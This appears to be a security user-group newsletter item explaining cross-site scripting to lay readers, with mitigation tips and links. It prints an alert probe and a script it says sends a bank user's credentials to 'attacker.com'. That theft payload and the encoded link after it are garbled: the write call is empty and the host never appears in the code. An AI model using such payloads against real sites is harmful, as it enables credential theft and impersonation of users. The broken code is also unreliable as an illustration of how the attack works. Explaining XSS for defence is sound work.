Orange County Security SIG

The main theme this month was Cross-Site-Scripting. The ability to insert malicious scripts (javascript, activeX, etc.) into benign web sites is called Cross-Site-Scripting which is sometimes abbreviated as CSS. But CSS also stands for Cascading-Style-Sheets! We are running out of letters for 3 letter acronyms. To keep civilization from falling into the dark ages we need version 6 of the English language. Or maybe we could just call cross-site-scripting XSS. When I first heard about XSS I didn't see much of a threat. Boy was I wrong. For one thing, those non-threatening scripts run with your security credentials. That means that the attacker can impersonate you. If you recently logged into a site like your bank, it could use your credentials to log into that site. Or it might email those credentials to someone else. It could also simply change some settings so your account would be less secure. One of the standard ways a XSS attack occurs is that the attacker first finds a site that has a page that uses server-side scripting (JSP/ASP/PHP) to output something previously input without changing the data. For example, if the site inputs a users nickname (let's call it "un") and simply displays it later with the words "hello". But if the web-page just echoes what is entered then it could run a command in that scripting language if it was input. So if someone use the link below at "your_bank.com" they will get a popup telling them if the site is vulnerable. <skript>alert('vulnerable')</skript> Once they know "your_bank.com" is vulnerable, they can use the following link to send your credentials (password?) to "attacker.com". <skript>document.location=’http://your_bank.com/search?nu=<skript>document.write("”)</skript>’</skript> Now your credentials have been sent to "attacker.com". But the above link would probably be obscured so you can't tell what's going on. You might actually see the following: %28%7d%3d&apropos=pos2http://your_bank.com/search? nu=%28%7balert%28%25VULNERABLE %27%29%7d%3b&apropos=pos2 A XSS is mainly a programming error on the web-site itself. But you can keep the damages to a minimum by shutting-off scripting and HTML in email, and not using persistent cookies (only session cookies). also read:
microsoft CERT Wikipedia ha.ckers.org sun (writing applets a list of vulnerable domains